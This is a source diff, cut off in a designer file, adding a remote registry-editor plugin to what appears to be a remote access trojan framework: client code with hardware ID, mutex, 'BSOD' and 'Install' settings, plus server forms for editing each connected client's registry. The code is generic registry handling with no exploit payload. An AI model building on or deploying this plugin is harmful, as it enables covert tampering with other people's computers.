static string GetValueSafe(this RegistryKey key, string keyName, string defaultValue = "") + { + try + { + return key.GetValue(keyName, defaultValue).ToString(); + } + catch + { + return defaultValue; + } + } + + /// + /// Attempts to obtain a readonly (non-writable) sub key from the key provided using the + /// specified name. Exceptions thrown will be caught and will only return a null key. + /// This method assumes the caller will dispose of the key when done using it. + /// + /// The key of which the sub key is obtained from. + /// The name of the sub-key. + /// Returns the sub-key obtained from the key and name provided; Returns null if + /// unable to obtain a sub-key. + public static RegistryKey OpenReadonlySubKeySafe(this RegistryKey key, string name) + { + try + { + return key.OpenSubKey(name, false); + } + catch + { + return null; + } + } + + /// + /// Attempts to obtain a writable sub key from the key provided using the specified + /// name. This method assumes the caller will dispose of the key when done using it. + /// + /// The key of which the sub key is obtained from. + /// The name of the sub-key. + /// Returns the sub-key obtained from the key and name provided; Returns null if + /// unable to obtain a sub-key. + public static RegistryKey OpenWritableSubKeySafe(this RegistryKey key, string name) + { + try + { + return key.OpenSubKey(name, true); + } + catch + { + return null; + } + } + + /// + /// Attempts to create a sub key from the key provided using the specified + /// name. This method assumes the caller will dispose of the key when done using it. + /// + /// The key of which the sub key is to be created from. + /// The name of the sub-key. + /// Returns the sub-key that was created for the key and name provided; Returns null if + /// unable to create a sub-key. + public static RegistryKey CreateSubKeySafe(this RegistryKey key, string name) + { + try + { + return key.CreateSubKey(name); + } + catch + { + return null; + } + } + + /// + /// Attempts to delete a sub-key and its children from the key provided using the specified + /// name. + /// + /// The key of which the sub-key is to be deleted from. + /// The name of the sub-key. + /// Returns true if the action succeeded, otherwise false. + public static bool DeleteSubKeyTreeSafe(this RegistryKey key, string name) + { + try + { + key.DeleteSubKeyTree(name, true); + return true; + } + catch + { + return false; + } + } + + /* + * Derived and Adapted from drdandle's article, + * Copy and Rename Registry Keys at Code project. + * Copy and Rename Registry Keys (Post Date: November 11, 2006) + * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + * This is a work that is not of the original. It + * has been modified to suit the needs of another + * application. + * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + * First Modified by StingRaptor on January 21, 2016 + * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + * Original Source: + * http://www.codeproject.com/Articles/16343/Copy-and-Rename-Registry-Keys + */ + + /// + /// Attempts to rename a sub-key to the key provided using the specified old + /// name and new name. + /// + /// The key of which the subkey is to be renamed from. + /// The old name of the sub-key. + /// The new name of the sub-key. + /// Returns true if the action succeeded, otherwise false. + public static bool RenameSubKeySafe(this RegistryKey key, string oldName, string newName) + { + try + { + //Copy from old to new + key.CopyKey(oldName, newName); + //Dispose of the old key + key.DeleteSubKeyTree(oldName); + return true; + } + catch + { + //Try to dispose of the newKey (The rename failed) + key.DeleteSubKeyTreeSafe(newName); + return false; + } + } + + /// + /// Attempts to copy a old subkey to a new subkey for the key + /// provided using the specified old name and new name. (throws exceptions) + /// + /// The key of which the subkey is to be deleted from. + /// The old name of the sub-key. + /// The new name of the sub-key. + public static void CopyKey(this RegistryKey key, string oldName, string newName) + { + //Create a new key + using (RegistryKey newKey = key.CreateSubKey(newName)) + { + //Open old key + using (RegistryKey oldKey = key.OpenSubKey(oldName, true)) + { + //Copy from old to new + RecursiveCopyKey(oldKey, newKey); + } + } + } + + /// + /// Attempts to rename a sub-key to the key provided using the specified old + /// name and new name. + /// + /// The source key to copy from. + /// The destination key to copy to. + private static void RecursiveCopyKey(RegistryKey sourceKey, RegistryKey destKey) + { + + //Copy all of the registry values + foreach (string valueName in sourceKey.GetValueNames()) + { + object valueObj = sourceKey.GetValue(valueName); + RegistryValueKind valueKind = sourceKey.GetValueKind(valueName); + destKey.SetValue(valueName, valueObj, valueKind); + } + + //Copy all of the subkeys + foreach (string subKeyName in sourceKey.GetSubKeyNames()) + { + using (RegistryKey sourceSubkey = sourceKey.OpenSubKey(subKeyName)) + { + using (RegistryKey destSubKey = destKey.CreateSubKey(subKeyName)) + { + //Recursive call to copy the sub key data + RecursiveCopyKey(sourceSubkey, destSubKey); + } + } + } + } + + /// + /// Attempts to set a registry value for the key provided using the specified + /// name, data and kind. If the registry value does not exist it will be created + /// + /// The key of which the value is to be set for. + /// The name of the value. + /// The data of the value + /// The value kind of the value + /// Returns true if the action succeeded, otherwise false. + public static bool SetValueSafe(this RegistryKey key, string name, object data, RegistryValueKind kind) + { + try + { + // handle type conversion + if (kind != RegistryValueKind.Binary && data.GetType() == typeof(byte[])) + { + switch (kind) + { + case RegistryValueKind.String: + case RegistryValueKind.ExpandString: + data = ByteConverter.ToString((byte[]) data); + break; + case RegistryValueKind.DWord: + data = ByteConverter.ToUInt32((byte[]) data); + break; + case RegistryValueKind.QWord: + data = ByteConverter.ToUInt64((byte[]) data); + break; + case RegistryValueKind.MultiString: + data = ByteConverter.ToStringArray((byte[]) data); + break; + } + } + key.SetValue(name, data, kind); + return true; + } + catch + { + return false; + } + } + + /// + /// Attempts to delete a registry value for the key provided using the specified + /// name. + /// + /// The key of which the value is to be delete from. + /// The name of the value. + /// Returns true if the action succeeded, otherwise false. + public static bool DeleteValueSafe(this RegistryKey key, string name) + { + try + { + key.DeleteValue(name); + return true; + } + catch + { + return false; + } + } + + /// + /// Attempts to rename a registry value to the key provided using the specified old + /// name and new name. + /// + /// The key of which the registry value is to be renamed from. + /// The old name of the registry value. + /// The new name of the registry value. + /// Returns true if the action succeeded, otherwise false. + public static bool RenameValueSafe(this RegistryKey key, string oldName, string newName) + { + try + { + //Copy from old to new + key.CopyValue(oldName, newName); + //Dispose of the old value + key.DeleteValue(oldName); + return true; + } + catch + { + //Try to dispose of the newKey (The rename failed) + key.DeleteValueSafe(newName); + return false; + } + } + + /// + /// Attempts to copy a old registry value to a new registry value for the key + /// provided using the specified old name and new name. (throws exceptions) + /// + /// The key of which the registry value is to be copied. + /// The old name of the registry value. + /// The new name of the registry value. + public static void CopyValue(this RegistryKey key, string oldName, string newName) + { + RegistryValueKind valueKind = key.GetValueKind(oldName); + object valueData = key.GetValue(oldName); + + key.SetValue(newName, valueData, valueKind); + } + + /// + /// Checks if the specified subkey exists in the key + /// + /// The key of which to search. + /// The name of the sub-key to find. + /// Returns true if the action succeeded, otherwise false. + public static bool ContainsSubKey(this RegistryKey key, string name) + { + foreach (string subkey in key.GetSubKeyNames()) + { + if (subkey == name) + { + return true; + } + } + return false; + } + + /// + /// Checks if the specified registry value exists in the key + /// + /// The key of which to search. + /// The name of the registry value to find. + /// Returns true if the action succeeded, otherwise false. + public static bool ContainsValue(this RegistryKey key, string name) + { + foreach (string value in key.GetValueNames()) + { + if (value == name) + { + return true; + } + } + return false; + } + + /// + /// Gets all of the value names associated with the registry key and returns + /// formatted strings of the filtered values. + /// + /// The registry key of which the values are obtained. + /// Yield returns formatted strings of the key and the key value. + public static IEnumerable> GetKeyValues(this RegistryKey key) + { + if (key == null) yield break; + + foreach (var k in key.GetValueNames().Where(keyVal => !keyVal.IsNameOrValueNull(key)).Where(k => !string.IsNullOrEmpty(k))) + { + yield return new Tuple(k, key.GetValueSafe(k)); + } + } + + /// + /// Gets the default value for a given data type of a registry value. + /// + /// The data type of the registry value. + /// The default value for the given . + public static object GetDefault(this RegistryValueKind valueKind) + { + switch (valueKind) + { + case RegistryValueKind.Binary: + return new byte[] {}; + case RegistryValueKind.MultiString: + return new string[] {}; + case RegistryValueKind.DWord: + return 0; + case RegistryValueKind.QWord: + return (long)0; + case RegistryValueKind.String: + case RegistryValueKind.ExpandString: + return ""; + default: + return null; + } + } + } +} diff --git a/Plugin/Regedit/Regedit/Handler/RegistryKeyHelper.cs b/Plugin/Regedit/Regedit/Handler/RegistryKeyHelper.cs new file mode 100644 index 0000000..5c057e1 --- /dev/null +++ b/Plugin/Regedit/Regedit/Handler/RegistryKeyHelper.cs @@ -0,0 +1,156 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using Microsoft.Win32; +using static Plugin.Handler.RegistrySeeker; + +namespace Plugin.Handler +{ + public static class RegistryKeyHelper + { + private static string DEFAULT_VALUE = String.Empty; + + /// + /// Adds a value to the registry key. + /// + /// Represents the possible values for a top-level node on a foreign machine. + /// The path to the registry key. + /// The name of the value. + /// The value. + /// If set to True, adds quotes to the value. + /// True on success, else False. + public static bool AddRegistryKeyValue(RegistryHive hive, string path, string name, string value, bool addQuotes = false) + { + try + { + using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path)) + { + if (key == null) return false; + + if (addQuotes && !value.StartsWith("\"") && !value.EndsWith("\"")) + value = "\"" + value + "\""; + + key.SetValue(name, value); + return true; + } + } + catch (Exception) + { + return false; + } + } + + /// + /// Opens a read-only registry key. + /// + /// Represents the possible values for a top-level node on a foreign machine. + /// The path to the registry key. + /// + public static RegistryKey OpenReadonlySubKey(RegistryHive hive, string path) + { + try + { + return RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenSubKey(path, false); + } + catch + { + return null; + } + } + + /// + /// Deletes the specified value from the registry key. + /// + /// Represents the possible values for a top-level node on a foreign machine. + /// The path to the registry key. + /// The name of the value to delete. + /// True on success, else False. + public static bool DeleteRegistryKeyValue(RegistryHive hive, string path, string name) + { + try + { + using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path)) + { + if (key == null) return false; + key.DeleteValue(name, true); + return true; + } + } + catch (Exception) + { + return false; + } + } + + /// + /// Checks if the provided value is the default value + /// + /// The name of the value + /// True if default value, else False + public static bool IsDefaultValue(string valueName) + { + return String.IsNullOrEmpty(valueName); + } + + /// + /// Adds the default value to the list of values and returns them as an array. + /// If default value already exists this function will only return the list as an array. + /// + /// The list with the values for which the default value should be added to + /// Array with all of the values including the default value + public static RegValueData[] AddDefaultValue(List values) + { + if(!values.Any(value => IsDefaultValue(value.Name))) + { + values.Add(GetDefaultValue()); + } + return values.ToArray(); + } + + /// + /// Gets the default registry values + /// + /// A array with the default registry values + public static RegValueData[] GetDefaultValues() + { + return new[] {GetDefaultValue()}; + } + + public static RegValueData CreateRegValueData(string name, RegistryValueKind kind, object value = null) + { + var newRegValue = new RegValueData {Name = name, Kind = kind}; + + if (value == null) + newRegValue.Data = new byte[] { }; + else + { + switch (newRegValue.Kind) + { + case RegistryValueKind.Binary: + newRegValue.Data = (byte[]) value; + break; + case RegistryValueKind.MultiString: + newRegValue.Data = ByteConverter.GetBytes((string[]) value); + break; + case RegistryValueKind.DWord: + newRegValue.Data = ByteConverter.GetBytes((uint) (int) value); + break; + case RegistryValueKind.QWord: + newRegValue.Data = ByteConverter.GetBytes((ulong) (long) value); + break; + case RegistryValueKind.String: + case RegistryValueKind.ExpandString: + newRegValue.Data = ByteConverter.GetBytes((string) value); + break; + } + } + + return newRegValue; + } + + private static RegValueData GetDefaultValue() + { + return CreateRegValueData(DEFAULT_VALUE, RegistryValueKind.String); + } + } +} diff --git a/Plugin/Regedit/Regedit/Handler/RegistrySeeker.cs b/Plugin/Regedit/Regedit/Handler/RegistrySeeker.cs new file mode 100644 index 0000000..83b9b78 --- /dev/null +++ b/Plugin/Regedit/Regedit/Handler/RegistrySeeker.cs @@ -0,0 +1,183 @@ +using Microsoft.Win32; +using System; +using System.Collections.Generic; + +namespace Plugin.Handler +{ + public class RegistrySeeker + { + + [Serializable] + public class RegSeekerMatch + { + public string Key { get; set; } + + public RegValueData[] Data { get; set; } + + public bool HasSubKeys { get; set; } + + public override string ToString() + { + return $"({Key}:{Data})"; + } + } + + [Serializable] + public class RegValueData + { + public string Name { get; set; } + + public RegistryValueKind Kind { get; set; } + + public byte[] Data { get; set; } + } + /// + /// The list containing the matches found during the search. + /// + private readonly List _matches; + + public RegSeekerMatch[] Matches => _matches?.ToArray(); + + public RegistrySeeker() + { + _matches = new List(); + } + + public void BeginSeeking(string rootKeyName) + { + if (!String.IsNullOrEmpty(rootKeyName)) + { + using(RegistryKey root = GetRootKey(rootKeyName)) + { + //Check if this is a root key or not + if (root != null && root.Name != rootKeyName) + { + //Must get the subKey name by removing root and '\' + string subKeyName = rootKeyName.Substring(root.Name.Length + 1); + using(RegistryKey subroot = root.OpenReadonlySubKeySafe(subKeyName)) + { + if(subroot != null) + Seek(subroot); + } + } + else + { + Seek(root); + } + } + } + else + { + Seek(null); + } + } + + private void Seek(RegistryKey rootKey) + { + // Get root registrys + if (rootKey == null) + { + foreach (RegistryKey key in GetRootKeys()) + //Just need root key so process it + ProcessKey(key, key.Name); + } + else + { + //searching for subkeys to root key + Search(rootKey); + } + } + + private void Search(RegistryKey rootKey) + { + foreach(string subKeyName in rootKey.GetSubKeyNames()) + { + RegistryKey subKey = rootKey.OpenReadonlySubKeySafe(subKeyName); + ProcessKey(subKey, subKeyName); + } + } + + private void ProcessKey(RegistryKey key, string keyName) + { + if (key != null) + { + List values = new List(); + + foreach (string valueName in key.GetValueNames()) + { + RegistryValueKind valueType = key.GetValueKind(valueName); + object valueData = key.GetValue(valueName); + values.Add(RegistryKeyHelper.CreateRegValueData(valueName, valueType, valueData)); + } + + AddMatch(keyName, RegistryKeyHelper.AddDefaultValue(values), key.SubKeyCount); + } + else + { + AddMatch(keyName, RegistryKeyHelper.GetDefaultValues(), 0); + } + } + + private void AddMatch(string key, RegValueData[] values, int subkeycount) + { + RegSeekerMatch match = new RegSeekerMatch {Key = key, Data = values, HasSubKeys = subkeycount > 0}; + + _matches.Add(match); + } + + public static RegistryKey GetRootKey(string subkeyFullPath) + { + string[] path = subkeyFullPath.Split('\\'); + try + { + switch (path[0]) // <== root; + { + case "HKEY_CLASSES_ROOT": + return RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64); + case "HKEY_CURRENT_USER": + return RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64); + case "HKEY_LOCAL_MACHINE": + return RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); + case "HKEY_USERS": + return RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64); + case "HKEY_CURRENT_CONFIG": + return RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64); + default: + /* If none of the above then the key must be invalid */ + throw new Exception("Invalid rootkey, could not be found."); + } + } + catch (SystemException) + { + throw new Exception("Unable to open root registry key, you do not have the needed permissions."); + } + catch(Exception e) + { + throw e; + } + } + + public static List GetRootKeys() + { + List rootKeys = new List(); + try + { + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64)); + } + catch (SystemException) + { + throw new Exception("Could not open root registry keys, you may not have the needed permission"); + } + catch (Exception e) + { + throw e; + } + + return rootKeys; + } + } +} diff --git a/Plugin/Regedit/Regedit/ILMerge.props b/Plugin/Regedit/Regedit/ILMerge.props new file mode 100644 index 0000000..aaadb12 --- /dev/null +++ b/Plugin/Regedit/Regedit/ILMerge.props @@ -0,0 +1,67 @@ + + + + + + + + + + + true + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Plugin/Regedit/Regedit/ILMergeOrder.txt b/Plugin/Regedit/Regedit/ILMergeOrder.txt new file mode 100644 index 0000000..3fda7f5 --- /dev/null +++ b/Plugin/Regedit/Regedit/ILMergeOrder.txt @@ -0,0 +1,4 @@ +# this file contains the partial list of the merged assemblies in the merge order +# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build +# and finetune merge order to your satisfaction + diff --git a/Plugin/Regedit/Regedit/Packet.cs b/Plugin/Regedit/Regedit/Packet.cs new file mode 100644 index 0000000..ed1f121 --- /dev/null +++ b/Plugin/Regedit/Regedit/Packet.cs @@ -0,0 +1,50 @@ +using Plugin.Handler; +using MessagePackLib.MessagePack; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Management; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading; + +namespace Plugin +{ + public static class Packet + { + public static string FileCopy = null; + public static string ZipPath = null; + + public static void Read(object data) + { + try + { + MsgPack unpack_msgpack = new MsgPack(); + unpack_msgpack.DecodeFromBytes((byte[])data); + switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString) + { + case "regManager": + { + new RegManager(unpack_msgpack); + } + break; + } + } + catch (Exception ex) + { + Error(ex.Message); + } + } + + public static void Error(string ex) + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Pac_ket").AsString = "Error"; + msgpack.ForcePathObject("Error").AsString = ex; + Connection.Send(msgpack.Encode2Bytes()); + } + } + +} \ No newline at end of file diff --git a/Plugin/Regedit/Regedit/Plugin.cs b/Plugin/Regedit/Regedit/Plugin.cs new file mode 100644 index 0000000..f6a1d10 --- /dev/null +++ b/Plugin/Regedit/Regedit/Plugin.cs @@ -0,0 +1,44 @@ +using MessagePackLib.MessagePack; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Net.Security; +using System.Net.Sockets; +using System.Security.Cryptography.X509Certificates; +using System.Text; +using System.Threading; + +namespace Plugin +{ + public class Plugin + { + public static Socket Socket; + public static Mutex AppMutex; + public static string Mutex; + public static string BSOD; + public static string Install; + public static string InstallFile; + + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bsod, string install) + { + Debug.WriteLine("Plugin Invoked"); + AppMutex = mutex; + Mutex = mtx; + BSOD = bsod; + Install = install; + Socket = socket; + Connection.ServerCertificate = certificate; + Connection.Hwid = hwid; + new Thread(() => + { + Connection.InitializeClient(msgPack); + }).Start(); + + while (Connection.IsConnected) + { + Thread.Sleep(1000); + } + } + } +} diff --git a/Plugin/Regedit/Regedit/Properties/AssemblyInfo.cs b/Plugin/Regedit/Regedit/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..46874a0 --- /dev/null +++ b/Plugin/Regedit/Regedit/Properties/AssemblyInfo.cs @@ -0,0 +1,37 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// General Information about an assembly is controlled through the following +// set of attributes. Change these attribute values to modify the information +// associated with an assembly. +//[assembly: AssemblyTitle("FileManager")] +//[assembly: AssemblyDescription("")] +//[assembly: AssemblyConfiguration("")] +//[assembly: AssemblyCompany("")] +//[assembly: AssemblyProduct("FileManager")] +//[assembly: AssemblyCopyright("Copyright © 2019")] +//[assembly: AssemblyTrademark("")] +//[assembly: AssemblyCulture("")] + +// Setting ComVisible to false makes the types in this assembly not visible +// to COM components. If you need to access a type in this assembly from +// COM, set the ComVisible attribute to true on that type. +[assembly: ComVisible(false)] + +// The following GUID is for the ID of the typelib if this project is exposed to COM +//[assembly: Guid("bee88186-769a-452c-9dd9-d0e0815d92bf")] + +// Version information for an assembly consists of the following four values: +// +// Major Version +// Minor Version +// Build Number +// Revision +// +// You can specify all the values or you can default the Build and Revision Numbers +// by using the '*' as shown below: +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.6.0")] +[assembly: AssemblyFileVersion("1.0.6.0")] +[assembly: Guid("1092ea5e-0249-4a81-a957-5bc44182128c")] diff --git a/Plugin/Regedit/Regedit/Regedit.csproj b/Plugin/Regedit/Regedit/Regedit.csproj new file mode 100644 index 0000000..37e2d17 --- /dev/null +++ b/Plugin/Regedit/Regedit/Regedit.csproj @@ -0,0 +1,83 @@ + + + + + + + Debug + AnyCPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65} + Library + Properties + Plugin + Regedit + v4.0 + 512 + true + + + + + true + full + false + ..\..\..\Binaries\Debug\Plugins\ + DEBUG;TRACE + prompt + 4 + + + none + true + ..\..\..\Binaries\Release\Plugins\ + TRACE + prompt + 4 + AnyCPU + + + + + + + + + + + + + + + + + + + + + + + + + + {DC199D9E-CF10-41DD-BBCD-98E71BA8679D} + MessagePackLib + + + + + + + + + + + + + This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. + + + + + + + \ No newline at end of file diff --git a/Plugin/Regedit/Regedit/Zip.cs b/Plugin/Regedit/Regedit/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/Plugin/Regedit/Regedit/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/Plugin/Regedit/Regedit/packages.config b/Plugin/Regedit/Regedit/packages.config new file mode 100644 index 0000000..1bc7f33 --- /dev/null +++ b/Plugin/Regedit/Regedit/packages.config @@ -0,0 +1,5 @@ + + + + + \ No newline at end of file diff --git a/Server/Forms/Form1.cs b/Server/Forms/Form1.cs index 1e2265d..b1db41e 100644 --- a/Server/Forms/Form1.cs +++ b/Server/Forms/Form1.cs @@ -2190,17 +2190,17 @@ namespace Server foreach (Clients client in GetSelectedClients()) { - FormFileManager fileManager = (FormFileManager)Application.OpenForms["remoteRegedit:" + client.ID]; - if (fileManager == null) + FormRegistryEditor registryEditor = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + client.ID]; + if (registryEditor == null) { - fileManager = new FormFileManager + registryEditor = new FormRegistryEditor { Name = "remoteRegedit:" + client.ID, Text = "remoteRegedit:" + client.ID, - F = this, - FullPath = Path.Combine(Application.StartupPath, "ClientsFolder", client.ID) + Client = client, + F = this }; - fileManager.Show(); + registryEditor.Show(); ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); } } diff --git a/Server/Forms/FormRegValueEditBinary.cs b/Server/Forms/FormRegValueEditBinary.cs index 634032e..46f7d81 100644 --- a/Server/Forms/FormRegValueEditBinary.cs +++ b/Server/Forms/FormRegValueEditBinary.cs @@ -9,6 +9,7 @@ using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; +using static Server.Helper.RegistrySeeker; namespace Server.Forms { diff --git a/Server/Forms/FormRegValueEditMultiString.cs b/Server/Forms/FormRegValueEditMultiString.cs index f39c3a5..d6f621c 100644 --- a/Server/Forms/FormRegValueEditMultiString.cs +++ b/Server/Forms/FormRegValueEditMultiString.cs @@ -8,6 +8,7 @@ using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; +using static Server.Helper.RegistrySeeker; namespace Server.Forms { diff --git a/Server/Forms/FormRegValueEditString.cs b/Server/Forms/FormRegValueEditString.cs index 74ec7ed..083f2ad 100644 --- a/Server/Forms/FormRegValueEditString.cs +++ b/Server/Forms/FormRegValueEditString.cs @@ -8,6 +8,7 @@ using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; +using static Server.Helper.RegistrySeeker; namespace Server.Forms { diff --git a/Server/Forms/FormRegValueEditWord.cs b/Server/Forms/FormRegValueEditWord.cs index 128e895..fe46683 100644 --- a/Server/Forms/FormRegValueEditWord.cs +++ b/Server/Forms/FormRegValueEditWord.cs @@ -9,6 +9,7 @@ using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; +using static Server.Helper.RegistrySeeker; namespace Server.Forms { diff --git a/Server/Forms/FormRegistryEditor.Designer.cs b/Server/Forms/FormRegistryEditor.Designer.cs index 8659ea5..99732ee 100644 --- a/Server/Forms/FormRegistryEditor.Designer.cs +++ b/Server/Forms/FormRegistryEditor.Designer.cs @@ -34,7 +34,12 @@ namespace Server.Forms System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormRegistryEditor)); this.tableLayoutPanel = new System.Windows.Forms.TableLayoutPanel(); this.splitContainer = new System.Windows.Forms.SplitContainer(); + this.tvRegistryDirectory = new Server.Helper.RegistryTreeView(); this.imageRegistryDirectoryList = new System.Windows.Forms.ImageList(this.components); + this.lstRegistryValues = new Server.Helper.AeroListView(); + this.hName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.hType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.hValue = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.imageRegistryKeyTypeList = new System.Windows.Forms.ImageList(this.components); this.statusStrip = new System.Windows.Forms.StatusStrip(); this.selectedStripStatusLabel = new System.Windows.Forms.ToolStripStatusLabel(); @@ -86,11 +91,7 @@ namespace Server.Forms this.qWORD64bitValueToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.multiStringValueToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.expandableStringValueToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); - this.tvRegistryDirectory = new RegistryTreeView(); - this.lstRegistryValues = new AeroListView(); - this.hName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); - this.hType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); - this.hValue = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.timer1 = new System.Windows.Forms.Timer(this.components); this.tableLayoutPanel.SuspendLayout(); ((System.ComponentModel.ISupportInitialize)(this.splitContainer)).BeginInit(); this.splitContainer.Panel1.SuspendLayout(); @@ -138,415 +139,6 @@ namespace Server.Forms this.splitContainer.SplitterDistance = 259; this.splitContainer.TabIndex = 0; // - // imageRegistryDirectoryList - // - this.imageRegistryDirectoryList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryDirectoryList.ImageStream"))); - this.imageRegistryDirectoryList.TransparentColor = System.Drawing.Color.Transparent; - this.imageRegistryDirectoryList.Images.SetKeyName(0, "folder.png"); - // - // imageRegistryKeyTypeList - // - this.imageRegistryKeyTypeList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryKeyTypeList.ImageStream"))); - this.imageRegistryKeyTypeList.TransparentColor = System.Drawing.Color.Transparent; - this.imageRegistryKeyTypeList.Images.SetKeyName(0, "reg_string.png"); - this.imageRegistryKeyTypeList.Images.SetKeyName(1, "reg_binary.png"); - // - // statusStrip - // - this.statusStrip.Dock = System.Windows.Forms.DockStyle.Fill; - this.statusStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.selectedStripStatusLabel}); - this.statusStrip.Location = new System.Drawing.Point(0, 539); - this.statusStrip.Name = "statusStrip"; - this.statusStrip.Size = new System.Drawing.Size(784, 22); - this.statusStrip.TabIndex = 1; - this.statusStrip.Text = "statusStrip"; - // - // selectedStripStatusLabel - // - this.selectedStripStatusLabel.Name = "selectedStripStatusLabel"; - this.selectedStripStatusLabel.Size = new System.Drawing.Size(0, 17); - // - // menuStrip - // - this.menuStrip.Dock = System.Windows.Forms.DockStyle.None; - this.menuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.fileToolStripMenuItem, - this.editToolStripMenuItem}); - this.menuStrip.Location = new System.Drawing.Point(0, 0); - this.menuStrip.Name = "menuStrip"; - this.menuStrip.Size = new System.Drawing.Size(84, 24); - this.menuStrip.TabIndex = 2; - // - // fileToolStripMenuItem - // - this.fileToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.exitToolStripMenuItem}); - this.fileToolStripMenuItem.Name = "fileToolStripMenuItem"; - this.fileToolStripMenuItem.Size = new System.Drawing.Size(37, 20); - this.fileToolStripMenuItem.Text = "File"; - // - // exitToolStripMenuItem - // - this.exitToolStripMenuItem.Name = "exitToolStripMenuItem"; - this.exitToolStripMenuItem.Size = new System.Drawing.Size(92, 22); - this.exitToolStripMenuItem.Text = "Exit"; - this.exitToolStripMenuItem.Click += new System.EventHandler(this.menuStripExit_Click); - // - // editToolStripMenuItem - // - this.editToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.modifyToolStripMenuItem1, - this.modifyBinaryDataToolStripMenuItem1, - this.modifyNewtoolStripSeparator, - this.newToolStripMenuItem2, - this.toolStripSeparator6, - this.deleteToolStripMenuItem2, - this.renameToolStripMenuItem2}); - this.editToolStripMenuItem.Name = "editToolStripMenuItem"; - this.editToolStripMenuItem.Size = new System.Drawing.Size(39, 20); - this.editToolStripMenuItem.Text = "Edit"; - this.editToolStripMenuItem.DropDownOpening += new System.EventHandler(this.editToolStripMenuItem_DropDownOpening); - // - // modifyToolStripMenuItem1 - // - this.modifyToolStripMenuItem1.Enabled = false; - this.modifyToolStripMenuItem1.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); - this.modifyToolStripMenuItem1.Name = 